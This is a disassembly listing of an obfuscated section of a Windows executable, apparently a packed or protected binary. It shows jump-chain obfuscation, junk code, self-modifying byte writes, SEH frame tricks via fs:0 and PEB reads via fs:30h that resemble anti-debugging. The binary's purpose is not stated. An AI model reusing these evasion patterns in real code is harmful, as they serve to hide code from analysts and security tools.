		jmp	loc_48E446
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B19F

loc_48B123:				; CODE XREF: sub_48B19F+9j
		jmp	loc_48CCA9
; END OF FUNCTION CHUNK	FOR sub_48B19F
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48B129:				; CODE XREF: eu81y7qg:0048A7D1j
		jmp	loc_48DC45
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48B12E:				; CODE XREF: sub_48DE75-190Ej
					; DATA XREF: sub_48CA30+3o
		mov	edx, [edx]
		push	offset loc_48AC0E
		jmp	nullsub_586
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------

locret_48B13A:				; CODE XREF: eu81y7qg:loc_48C5B1j
		retn
; ---------------------------------------------------------------------------
		align 4
aHapzXbrMbASl	db 'h §½Xàš;ÛŒÀ',8,'Ås‹',0 ; DATA XREF: eu81y7qg:0048CE73o
		dd 840FD029h, 331h, 0FFF6BBE9h,	27E800FFh, 0FFFFF2h, 1270E900h
		dd 0
; ---------------------------------------------------------------------------
		jmp	loc_48AC79
; ---------------------------------------------------------------------------
		align 2
; START	OF FUNCTION CHUNK FOR sub_48AEB5

loc_48B172:				; CODE XREF: sub_48AEB5:loc_48E89Cj
		test	eax, ebx
		xchg	ebp, [esp+0]
		mov	ebx, ebp
		pop	ebp
		sub	[edi+edx+68FFFFEBh], al
		pusha
		sub	ah, [edi-3Fh]
		pop	eax
		jmp	loc_48EA7C
; END OF FUNCTION CHUNK	FOR sub_48AEB5
; ---------------------------------------------------------------------------
		xchg	eax, [esp]
		pop	eax
		push	3CB528CFh
		xchg	ebp, [esp]
		mov	eax, ebp
		jmp	loc_48EEAF
; ---------------------------------------------------------------------------
		db 0

; =============== S U B	R O U T	I N E =======================================



sub_48B19F	proc near		; CODE XREF: sub_48CE11:loc_489EBBp

; FUNCTION CHUNK AT 0048B123 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048B631 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048B6B4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048CCA9 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0048DB2F SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0048DB37 SIZE 00000011 BYTES

		xchg	eax, [esp+0]
		pop	eax

loc_48B1A3:				; CODE XREF: eu81y7qg:0048B720j
		mov	byte ptr [edx],	81h
		adc	edx, ebx
		jmp	loc_48B123
sub_48B19F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

locret_48B1AD:				; CODE XREF: eu81y7qg:0048D579j
		retn
; ---------------------------------------------------------------------------
		jmp	locret_48C4E9
; ---------------------------------------------------------------------------

loc_48B1B3:				; DATA XREF: sub_48CBF4+8o
		add	esi, 0B34478Ch
		xchg	eax, ecx
		db	36h
		call	sub_48ED5B
; START	OF FUNCTION CHUNK FOR sub_48D725

loc_48B1C0:				; CODE XREF: sub_48D725+Aj
		jmp	loc_48AB46
; END OF FUNCTION CHUNK	FOR sub_48D725
; ---------------------------------------------------------------------------
		mov	esi, 0C4D7228Ah

loc_48B1CA:				; CODE XREF: eu81y7qg:0048AC1Bj
		mov	[ebp+0], eax
		jmp	sub_48E778
; ---------------------------------------------------------------------------
		dw 0C300h
		db 2 dup(0)
; ---------------------------------------------------------------------------

locret_48B1D6:				; CODE XREF: eu81y7qg:loc_48ACB9j
		retn
; ---------------------------------------------------------------------------
		align 4

loc_48B1D8:				; DATA XREF: eu81y7qg:0048A397o
		rol	edx, 3
		push	offset loc_489A46
		jmp	loc_48E1ED
; ---------------------------------------------------------------------------
		db 2 dup(0), 0C1h
; ---------------------------------------------------------------------------
		ror	dword ptr [esi], 87h
		adc	al, 24h
		pop	edx
		pop	large dword ptr	fs:0
		jmp	loc_48BD47
; ---------------------------------------------------------------------------

loc_48B1FA:				; DATA XREF: sub_48DE75-2AFDo
		xchg	eax, [esp]
		jmp	loc_48EC83
; ---------------------------------------------------------------------------
		dw 6800h
; ---------------------------------------------------------------------------
		test	al, 0C6h
		mov	ch, 0DBh
		xchg	ebx, [esp]
		push	ebx
		pop	eax
		jmp	loc_48CD9E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_601. PRESS KEYPAD	"+" TO EXPAND]
byte_48B213	db 87h			; DATA XREF: sub_48AB88+1E5o
		db 4, 24h
word_48B216	dw 0EC57h		; DATA XREF: sub_48DE75-465Ao
		db 51h
byte_48B219	db 92h,	5, 94h		; DATA XREF: sub_48AB88:loc_48D09Bo
		dd 500048E7h, 0FFE3EAE8h, 94E900FFh, 0FFFFFAh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DD69

loc_48B22C:				; CODE XREF: sub_48DD69-239Ej
		jmp	loc_48C317
; END OF FUNCTION CHUNK	FOR sub_48DD69
; ---------------------------------------------------------------------------
		align 2

loc_48B232:				; CODE XREF: eu81y7qg:0048B366j
		jmp	loc_48EC61
; ---------------------------------------------------------------------------
		align 4
		jmp	loc_48EE0B
; ---------------------------------------------------------------------------
		align 2
		dw 9CE9h
		dd 0FFFFF5h
; ---------------------------------------------------------------------------

loc_48B244:				; CODE XREF: eu81y7qg:004895F4j
					; eu81y7qg:loc_48A1D5j
		mov	eax, large fs:30h
		push	esi
		push	offset loc_48A6E1
		jmp	locret_48D4CB
; ---------------------------------------------------------------------------
		align 4

; =============== S U B	R O U T	I N E =======================================



sub_48B258	proc near		; CODE XREF: eu81y7qg:004895C8j
					; sub_48DE75:loc_48B3FBp

; FUNCTION CHUNK AT 00489932 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048A7B7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048A876 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048AADC SIZE 0000002B BYTES
; FUNCTION CHUNK AT 0048B6ED SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048CE9A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048CF4C SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0048D86F SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0048D8FB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048EC6E SIZE 0000000A BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	esi
		mov	esi, offset loc_48D875
		jmp	loc_48A7B7
sub_48B258	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 4
		dd 0C392C281h, 26E87514h, 22h, 2EF78100h, 815C267Dh, 14FC5DE7h
		dd 0B1F78162h, 68D9B35Ch, 48D62Bh, 1807E9h, 0E9EA8700h
		dd 2374h
; ---------------------------------------------------------------------------

loc_48B298:				; DATA XREF: sub_48DE75-2F2Co
		push	eax

loc_48B299:				; DATA XREF: sub_48DE75:loc_48D356o
		cli
		push	4A27A199h
		pop	eax
		or	eax, 3C16F2Eh
		and	eax, 0C014A62Ch
		rol	eax, 1Bh
		push	offset loc_48CD56
		jmp	locret_48E9AF
; ---------------------------------------------------------------------------
		db 2 dup(0), 0BDh
		dd 0BF16B578h, 0FFE1CDE9h, 94A568FFh, 0C5E90048h, 0
; ---------------------------------------------------------------------------
		test	eax, 963788D1h
		jmp	loc_48BC2B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48CF7E

loc_48B2DB:				; CODE XREF: sub_48CF7E:loc_48BEC7j
		and	ebp, 0C770174Eh
		pushf
		jmp	sub_4894C2
; END OF FUNCTION CHUNK	FOR sub_48CF7E
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		dd 1373E900h, 89000000h, 0C17E90Eh, 81000000h, 834C5EE3h
		dd 7DC381AAh, 8153D487h, 0B35352E3h, 96DA68F8h,	3AE90048h
		dd 18h,	73F1C7F7h, 94E9E831h, 0FFFFFFFAh, 45C0C015h, 2DE85300h
		db 0Fh,	2 dup(0)
; ---------------------------------------------------------------------------

loc_48B32B:				; CODE XREF: eu81y7qg:0048A126j
		jmp	loc_48DC45
; ---------------------------------------------------------------------------
		dd 24348700h, 4899DC68h, 1B04E900h
		db 3 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48E917

loc_48B33F:				; CODE XREF: sub_48E917:loc_48E920j
		mov	byte ptr [edi],	0FFh
		pop	edi
		and	ebx, 0D8FFF6BBh
		xor	ebx, 8F0D8629h
		push	edx
		mov	edx, offset loc_48A2BD
		jmp	loc_48EE34
; END OF FUNCTION CHUNK	FOR sub_48E917
; ---------------------------------------------------------------------------

loc_48B35A:				; CODE XREF: eu81y7qg:0048EA95j
		sub	edx, 0ECD879DAh
		add	edx, 2FFE59DAh
		jmp	loc_48B232
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48B36B:				; CODE XREF: sub_48DE75-1F19j
		jbe	loc_48D3AD
		pop	eax

loc_48B372:				; CODE XREF: sub_48DE75:loc_48BF4Ej
		add	eax, 0FF9FAF03h
		push	offset loc_48B1FA
		jmp	loc_48E87E
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

locret_48B383:				; CODE XREF: eu81y7qg:0048E691j
		retn
; ---------------------------------------------------------------------------
		dd 0C4EE900h, 0		; CODE XREF: eu81y7qg:0048D9ABj
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48AEB5

loc_48B38C:				; CODE XREF: sub_48AEB5+188Fj
		jmp	loc_48DC45
; END OF FUNCTION CHUNK	FOR sub_48AEB5
; ---------------------------------------------------------------------------
		align 2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_581. PRESS KEYPAD	"+" TO EXPAND]
		align 4
		dd 0FFF725E9h, 0EE11BFFFh, 1C8709EAh, 830F5B24h, 57Bh
		dd 1EF2820Fh, 0E9510000h, 0FFFFEC38h
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48B3B6:				; DATA XREF: sub_489492:loc_48DB98o
		mov	byte ptr [eax],	8Bh
		xchg	ecx, [esp]
		mov	eax, ecx
		pop	ecx
		jmp	loc_48CE72
; ---------------------------------------------------------------------------
		db 0

; =============== S U B	R O U T	I N E =======================================



sub_48B3C5	proc near

; FUNCTION CHUNK AT 0048A446 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0048B4FA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048E771 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048E8F9 SIZE 0000000A BYTES

		xchg	edx, [esp+0]
		xchg	edi, [esp+0]
		mov	edx, edi
		pop	edi
		add	eax, 9077B44Ch
		jmp	loc_48E771
sub_48B3C5	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 68h,	69h, 95h
		dd 96E91252h, 81FFFFEBh, 2CDA26F9h, 38CFE913h, 0F000000h
		dd 14AB8Fh, 0A6810F00h
		db 0E2h, 2 dup(0FFh)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48B3FB:				; CODE XREF: sub_48DE75:loc_48C8F4j
		call	sub_48B258
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48B402:				; CODE XREF: sub_48DE75:loc_48D458j
		add	ecx, 0D0E5FDA1h
		call	sub_48AC5D
		add	[ecx+11960FDAh], al
		add	eax, [edi+95A2414h]
		ror	byte ptr [edi],	84h
		db	65h
		xor	al, 0
		add	[edx+68h], dl
		cmp	al, 25h
		push	0FFFFFFE5h
		xchg	ebx, [esp+0Ch+var_C]
		jmp	loc_48B802
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		dw 5300h
; ---------------------------------------------------------------------------
		jmp	loc_48CB82
; ---------------------------------------------------------------------------
		db 2 dup(0), 0C3h
		dd 63E900h, 53000000h, 489AE568h, 0E693E900h
		db 2 dup(0FFh),	0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48CAC2

loc_48B44B:				; CODE XREF: sub_48CAC2:loc_48C1B0j
		mov	byte ptr [ecx],	0C3h
		pop	ecx
		pop	ebp
		xchg	esi, [esp-8+arg_4]
		mov	ebp, esi
		pop	esi
		retn
; END OF FUNCTION CHUNK	FOR sub_48CAC2
; ---------------------------------------------------------------------------

loc_48B457:				; CODE XREF: eu81y7qg:0048E657j
		jmp	loc_48AC84
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48B45D:				; CODE XREF: eu81y7qg:0048DC63j
		mov	byte ptr [edi],	8Bh
		pop	edi
		rol	esi, 14h
		add	esi, 0FA60195Fh
		jmp	loc_48CE07
; ---------------------------------------------------------------------------
		align 10h

locret_48B470:				; CODE XREF: eu81y7qg:loc_48CD97j
		retn
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48B473:				; CODE XREF: eu81y7qg:004895D6j
		jmp	loc_48DC45
; ---------------------------------------------------------------------------
		dd 0FF6A0000h, 0C0C015A2h, 6E90045h, 0FFFFEEh, 66058D00h
		dd 0C60048DAh
		db 0, 2	dup(0C3h)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A09A

loc_48B493:				; CODE XREF: sub_48A09A+Dj
		jmp	sub_48A0B7
; END OF FUNCTION CHUNK	FOR sub_48A09A
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48B49A:				; CODE XREF: eu81y7qg:00489602j
		jmp	loc_48B09D
; ---------------------------------------------------------------------------
		align 10h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48C117

loc_48B4A1:				; CODE XREF: sub_48C117+168Bj
		push	offset loc_48AB3C
		jmp	nullsub_476
; END OF FUNCTION CHUNK	FOR sub_48C117
; ---------------------------------------------------------------------------
		align 4
		dd 0F517E99Ch, 5000FFFFh, 13AEE9h, 68000000h, 10A40420h
		dd 0FFED5CE9h, 810000FFh, 0C5B824F3h, 36A4E976h, 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48CF7E

loc_48B4D4:				; CODE XREF: sub_48CF7E:loc_48A4BAj
		jnz	sub_4894C2
		jmp	loc_48BEC7
; END OF FUNCTION CHUNK	FOR sub_48CF7E
; ---------------------------------------------------------------------------
		test	ebp, 0DC3271ADh
		jmp	loc_48EA0B
; ---------------------------------------------------------------------------
		sub	edi, 0BF8A8A0Dh
		not	edx
		jmp	loc_48D4F2
; ---------------------------------------------------------------------------
		align 4
		db 0, 0C3h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B3C5

loc_48B4FA:				; CODE XREF: sub_48B3C5+3539j
		jmp	nullsub_585
; END OF FUNCTION CHUNK	FOR sub_48B3C5
; ---------------------------------------------------------------------------
		align 10h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48B501:				; CODE XREF: sub_48DE75+419j
		and	esi, 2E5D8FD1h
		xor	esi, 1CD996A4h
		add	edx, esi
		pop	esi
		call	sub_48D160
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48B516:				; CODE XREF: eu81y7qg:0048AD08j
		jmp	locret_48B936
; ---------------------------------------------------------------------------
		align 4
		add	edx, 20ED106Dh
		jmp	loc_48EC78
; ---------------------------------------------------------------------------
		align 4

; =============== S U B	R O U T	I N E =======================================



sub_48B528	proc near		; CODE XREF: sub_48DE75:loc_48E1E1p

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0048C937 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048DC11 SIZE 00000013 BYTES

		xchg	edi, [esp+0]
		xchg	esi, [esp+0]
		mov	edi, esi
		pop	esi
		mov	ebp, esp
		push	edx
		jmp	loc_48DC11
sub_48B528	endp

; ---------------------------------------------------------------------------
		db 2 dup(0), 9Dh
		dd 2355E8h
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A5B4

loc_48B542:				; CODE XREF: sub_48A5B4+Fj
					; sub_48C2E0+Aj
		jmp	loc_48CDFC
; END OF FUNCTION CHUNK	FOR sub_48A5B4
; ---------------------------------------------------------------------------

loc_48B547:				; CODE XREF: eu81y7qg:0048AB27j
		xchg	esi, [esp]
		pop	esi
		add	eax, 360BF50h
		push	ecx
		jmp	loc_48B940
; ---------------------------------------------------------------------------
		align 4
		db 0

; =============== S U B	R O U T	I N E =======================================



sub_48B559	proc near		; CODE XREF: sub_48EA14:loc_48996Ep

; FUNCTION CHUNK AT 00489A58 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048A05B SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0048AE45 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048BA0F SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0048C3A4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048DADC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048E86A SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		xchg	ebp, [esp+0]
		mov	ecx, ebp
		pop	ebp
		push	46B40E0Eh
		pop	edx
		rol	edx, 16h
		jmp	loc_48AE45
sub_48B559	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		add	ebp, ebx
		mov	ebp, edx
		jmp	loc_48E2C9
; ---------------------------------------------------------------------------
		db 81h,	0C1h, 4Eh
		dd 87F54A0Fh, 4DE82434h, 0FFFFE9h, 310000C3h, 0C3C0h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48B590:				; CODE XREF: eu81y7qg:0048CBD6j
					; eu81y7qg:0048D248j ...
		pop	large dword ptr	fs:0
		add	esp, 4
		jmp	loc_48A033
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		align 10h
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48B5A0:				; CODE XREF: sub_48DE75:loc_48E258j
		push	489AC4h
		jmp	loc_48DA92
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		db 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_576. PRESS KEYPAD	"+" TO EXPAND]
		dd 0B7890F00h, 0E9FFFFFEh, 21ABh
; ---------------------------------------------------------------------------
		retn
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_592. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		pop	edx
		xor	edx, 0A5F280E3h
		sub	edx, 1EDEB062h
		add	edx, 5C0C6699h
		jmp	loc_48D410
; ---------------------------------------------------------------------------
		dw 0F781h
		dd 0D8464h, 3368C7ABh, 0E90048CDh, 3349h, 0F71F8700h, 4FEF81D6h
		dd 0FF6F50Ah, 1AC085h, 12266800h, 1BE91907h, 81000027h
		dd 0EFAFF1DFh, 22EE994h
		db 3 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B80F

loc_48B60B:				; CODE XREF: sub_48B80F:loc_48E9A8j
		push	offset dword_48E3D4
		jmp	near ptr word_489ABE+1
; END OF FUNCTION CHUNK	FOR sub_48B80F
; ---------------------------------------------------------------------------
		db 87h,	3Ch, 24h
		dd 0B356685Fh, 815B1221h, 368211EBh, 0AA685669h, 5E6F5690h
		dd 0FFE2DEE9h
		db 0FFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B19F

loc_48B631:				; CODE XREF: sub_48B19F:loc_48B6B4j
		jnz	loc_48DB37
		add	cl, ch
		jge	short loc_48B66C
; END OF FUNCTION CHUNK	FOR sub_48B19F
; ---------------------------------------------------------------------------
		db 0
		dd 0E9000000h, 2BC4h, 0CE5C100h, 8115C7C1h, 688F3EC0h
		dd 24E1E9CBh
		db 3 dup(0)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_571. PRESS KEYPAD	"+" TO EXPAND]
		db 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_558. PRESS KEYPAD	"+" TO EXPAND]
		dw 0EAE9h
		dd 0FFFFF9h
		db 0
; ---------------------------------------------------------------------------

loc_48B661:				; CODE XREF: eu81y7qg:0048BA94j
		push	offset byte_48C2B9
		jmp	near ptr dword_489508+0Eh
; ---------------------------------------------------------------------------
		align 4

loc_48B66C:				; CODE XREF: sub_48B19F+49Aj
					; DATA XREF: eu81y7qg:0048EE0Eo
		push	ebx
		push	52FF6EBAh
		pop	ebx
		sub	ebx, 0AF630139h
		add	ebx, 0F54A4D64h
		jnz	loc_48EE92
; ---------------------------------------------------------------------------
		db 2 dup(0), 0Fh
		dd 23BC86h, 2E8C100h, 1FF5E9h, 3000000h
		db 0CFh
; ---------------------------------------------------------------------------

loc_48B699:				; CODE XREF: eu81y7qg:loc_48BE04j
		xor	ecx, 0EFF485B7h
		add	ecx, ebp
		call	sub_48D676
; ---------------------------------------------------------------------------
		dw 0
; ---------------------------------------------------------------------------
		cmp	edi, 0F057A1D2h
		jmp	loc_48A3C1
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B19F

loc_48B6B4:				; CODE XREF: sub_48B19F+1B18j
		jmp	loc_48B631
; END OF FUNCTION CHUNK	FOR sub_48B19F
; ---------------------------------------------------------------------------
		db 2 dup(0), 8Bh	; CODE XREF: eu81y7qg:loc_48C3FFj
		dd 3C875EC6h, 5FEF8B24h, 1494E9h, 840F0000h, 0FFFFEA0Ah
		dd 0E781378Bh, 979331D6h, 9891F781h, 0C7C1DBC1h, 0D008681Ah
		dd 40E90048h, 0FFFFF5h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B258

loc_48B6ED:				; CODE XREF: sub_48B258+1D09j
		jge	loc_48CE9A
		add	cl, ch		; CODE XREF: sub_48A8BE+E5Dj
		insb
		sbb	[eax], eax
; END OF FUNCTION CHUNK	FOR sub_48B258
; ---------------------------------------------------------------------------
		dd 0E9000000h, 0FFFFEA10h, 0DF2E081h, 7BE9114Eh, 17h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A8BE

loc_48B70D:				; CODE XREF: sub_48A8BE:loc_489660j
		mov	byte ptr [eax],	87h
		pop	eax
		pop	ecx
		rol	ecx, 1Fh
		or	ecx, 9C7B02DEh
		jmp	near ptr loc_48B6F3+1
; END OF FUNCTION CHUNK	FOR sub_48A8BE
; ---------------------------------------------------------------------------
		jmp	loc_48B1A3
; ---------------------------------------------------------------------------
		mov	eax, [eax]
		push	489DE9h
		jmp	locret_48A030
; ---------------------------------------------------------------------------
		db 68h,	0BCh, 0CCh
		dd 26E90048h, 0C1FFFFE8h, 13E917E3h, 8100002Ah,	0E252C9C0h
; ---------------------------------------------------------------------------
		push	ebp

loc_48B749:				; DATA XREF: sub_48CA8B+2o
		sub	[eax], eax
		push	ebp
		mov	ebp, edi
		xchg	ebp, [esp]
		pushf
		push	offset loc_48BE21
		jmp	locret_48CD88
; ---------------------------------------------------------------------------
		db 0
byte_48B75D	db 49h,	0Fh, 85h	; DATA XREF: eu81y7qg:00489A48o
		dd 22C5h, 0FFF9FCE9h
		db 0FFh

; =============== S U B	R O U T	I N E =======================================



sub_48B769	proc near		; CODE XREF: eu81y7qg:0048E85Ep
		xchg	ecx, [esp+0]
		pop	ecx
		add	eax, ebp
		push	offset dword_48BB28
		jmp	near ptr loc_489978+1
sub_48B769	endp

; ---------------------------------------------------------------------------
		db 2 dup(0), 0C6h	; CODE XREF: sub_48DE75+3C5j
; ---------------------------------------------------------------------------
		add	eax, [edi+240C875Bh]
		mov	eax, ecx
		pop	ecx
		push	eax
		mov	eax, offset byte_48D111
		jmp	loc_48DB83
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48B791:				; CODE XREF: eu81y7qg:0048A890j
					; sub_48DE75-1789p
		xchg	esi, [esp]
		pop	esi
		call	sub_48C27A

loc_48B79A:				; CODE XREF: eu81y7qg:loc_48A056j
		mov	byte ptr [ecx],	87h
		pop	ecx

loc_48B79E:				; CODE XREF: eu81y7qg:0048ACF4j
		or	eax, 4494433Ah
		call	loc_48A0FD
; ---------------------------------------------------------------------------
		db 2 dup(0), 0E9h
		dd 2495h, 0C1810000h, 5A457F5Fh, 0E9240C87h, 0FFFFF73Dh
		dd 58D0000h, 48AA9Fh, 68C30006h, 48EAA4h, 2043E9h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DD69

loc_48B7D5:				; CODE XREF: sub_48DD69+5j
		push	5819F39Eh
		xchg	edx, [esp+4+var_4]
		mov	ecx, edx
		pop	edx
		and	ecx, 0E5A0E50Eh
		jmp	loc_48B9BB
; END OF FUNCTION CHUNK	FOR sub_48DD69
; ---------------------------------------------------------------------------
		align 4
		dd 24048700h, 99B95158h, 0E90048CCh, 880h
		db 2 dup(0)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_583. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

locret_48B7FF:				; CODE XREF: eu81y7qg:loc_48B8C6j
		retn
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48B802:				; CODE XREF: sub_48DE75-2A4Cj
		jmp	loc_48CCD8
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		align 4
		test	eax, ecx
		jmp	loc_48D57F

; =============== S U B	R O U T	I N E =======================================



sub_48B80F	proc near		; CODE XREF: sub_48BAD9p

; FUNCTION CHUNK AT 0048B60B SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048E9A8 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	large dword ptr	fs:0
		mov	large fs:0, esp
		mov	eax, large fs:30h
		jmp	loc_48E9A8
sub_48B80F	endp

; ---------------------------------------------------------------------------
		align 2
; START	OF FUNCTION CHUNK FOR sub_48C515

loc_48B82E:				; CODE XREF: sub_48C515:loc_48E897j
		push	offset loc_489D9A
		jmp	nullsub_567
; END OF FUNCTION CHUNK	FOR sub_48C515
; ---------------------------------------------------------------------------
		xchg	eax, [esp]
		pop	eax
		add	esi, ebp
		push	offset sub_48A548
		jmp	locret_48A540
; ---------------------------------------------------------------------------
		dd 8100C300h, 0E98AD2F0h, 207CE81Fh, 86E90000h,	34h, 16850F00h
		dd 81FFFFE7h, 1AC6F1D8h, 0E88FE9DCh, 0FFFFh
; ---------------------------------------------------------------------------

loc_48B870:				; CODE XREF: eu81y7qg:loc_48EEAFj
		pop	ebp
		rol	eax, 1Fh
		add	eax, 61EE241Ch
		rol	byte ptr [esp],	0E9h
		arpl	di, sp
; ---------------------------------------------------------------------------
		dd 6400FFFFh, 30058Bh, 0C0810000h, 3EC502C3h, 0FDA5C081h
		dd 0F1E9C13Ah, 9, 420E8h
		db 0
; ---------------------------------------------------------------------------

loc_48B8A1:				; CODE XREF: eu81y7qg:0048A2B0j
		sub	esi, 43CB0DBAh
		add	esi, 8093E3D9h

loc_48B8AD:				; CODE XREF: eu81y7qg:loc_48CEFAj
		jmp	loc_48CC65

; =============== S U B	R O U T	I N E =======================================



sub_48B8B2	proc near		; CODE XREF: sub_48DE75-3988p

; FUNCTION CHUNK AT 0048BC06 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048E885 SIZE 00000011 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		call	eax
		jmp	loc_48BC06
sub_48B8B2	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_48B8BD:				; CODE XREF: eu81y7qg:0048C6FDj
					; eu81y7qg:loc_48D8E1j
		push	edx
		jmp	loc_48D844
; ---------------------------------------------------------------------------
		align 4
		db 0, 0C3h
; ---------------------------------------------------------------------------

loc_48B8C6:				; CODE XREF: eu81y7qg:00489A4Dj
		jmp	locret_48B7FF
; ---------------------------------------------------------------------------

loc_48B8CB:				; DATA XREF: sub_48DE75:loc_48E564o
		push	edx
		mov	edx, ebx
		xchg	edx, [esp]
		mov	ebx, 48B7C8h
		jmp	loc_48BD42
; ---------------------------------------------------------------------------
		align 4
		db 0
; ---------------------------------------------------------------------------

loc_48B8DD:				; CODE XREF: eu81y7qg:00489C92j
		mov	byte ptr [ecx],	87h
		pop	ecx
		add	eax, 59621734h
		xchg	eax, [esp]
		jmp	loc_48E997
; ---------------------------------------------------------------------------
		align 10h
		dd 0A2685200h, 0E9D7B913h, 122Ch
; ---------------------------------------------------------------------------

loc_48B8FC:				; CODE XREF: eu81y7qg:0048A9C2j
		or	ecx, eax
		mov	edx, [ebx]
		mov	ecx, esi
		xor	eax, 0AD9182C2h
		jmp	loc_48C9B2
; ---------------------------------------------------------------------------
		align 2
		dw 8E0Fh
		dd 0FFFFE99Ah, 5B241C87h, 69E2F081h, 8AE94D9Eh,	0FFFFFECh
		dd 197782h, 80685700h, 5FD2E5A9h, 14CCE9h
		db 2 dup(0)
; ---------------------------------------------------------------------------

locret_48B936:				; CODE XREF: eu81y7qg:loc_48B516j
		retn
; ---------------------------------------------------------------------------
		align 4
		dd 102AE900h, 0
; ---------------------------------------------------------------------------

loc_48B940:				; CODE XREF: eu81y7qg:0048B552j
		mov	ecx, esi
		xchg	ecx, [esp]
		pushf
		push	offset loc_48D053
		jmp	loc_48CFE3
; ---------------------------------------------------------------------------
